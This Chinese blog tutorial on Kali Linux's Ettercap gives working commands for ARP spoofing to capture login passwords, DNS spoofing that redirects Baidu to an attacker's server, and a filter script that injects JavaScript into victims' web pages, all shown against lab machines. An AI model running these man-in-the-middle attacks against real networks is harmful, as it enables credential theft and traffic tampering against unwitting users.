注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

抖m型丧病女仆的宅窝

专注渗透测试|无线安全|kali_linux|一个宅女的小窝

 
 
 

日志

 
 

Ettercap几种好玩的姿势  

2016-01-30 10:05:55|  分类: kali_linux |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

0x00
简单的arp欺骗

命令
ettercap -i 网卡 -Tq -M arp:remote /受害者ip/ /网关ip/
以下是我欺骗192.168.1.102主机并模拟http-get请求登陆抓取到的密码

Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

0x01
简单的dns欺骗
先修改etter.dns文件
leafpad /etc/ettercap/etter.dns
Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

这句话的意思是欺骗对方访问百度自动跳转到192.168.1.113

欺骗命令
ettercap -T -i eth0 -q -P dns_spoof // //  ps:// // 可以欺骗局域网下面所有的人
以下是我欺骗windows2003虚拟机的效果
Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝
 

Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

开个apache服务装一下小B 目标访问百度自动跳转

Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝
 

0x02
过滤脚本简单使用
ettercap还有很强大的过滤脚本功能,通过使用过滤脚本,可以对截获到的数据包做修改然后转发给被攻击的主机。可以实现替换网页内
容、替换下载内容、在被入侵者访问的网页中插入代码等功能…

以下是网上找来的简单的javascript弹窗代码 类似dsploit的javascript注入
-------------------------萌萌哒分割线-----------------------------
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding""Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>""<head><script type="text/javascript">alert('内容');</script>");
replace("<HEAD>""<HEAD><script type="text/javascript">alert('内容');</script>");
msg("test!!\n");
}
-------------------------萌萌哒分割线-----------------------------

以上文件保存为*.filter
但是要编译一下ettercap的脚本 ettercap只读懂2进制的文本
编译命令
Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

调用脚本命令

ettercap -T -q -i 网卡 -F 脚本名字.ef -M arp:remote /受害者/  /网关/
 
Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝
 
替换图片也是如此

Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝

我欺骗的主机搜索图片已经乱糟糟的了 估计就是欺骗成功了~

driftnet还能截获受害者图片


Ettercap几种好玩的姿势 - Saya - 抖m型丧病女仆的宅窝
 
转载请注明原文地址:http://lsaya.blog.163.com/
  评论这张
 
阅读(265)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017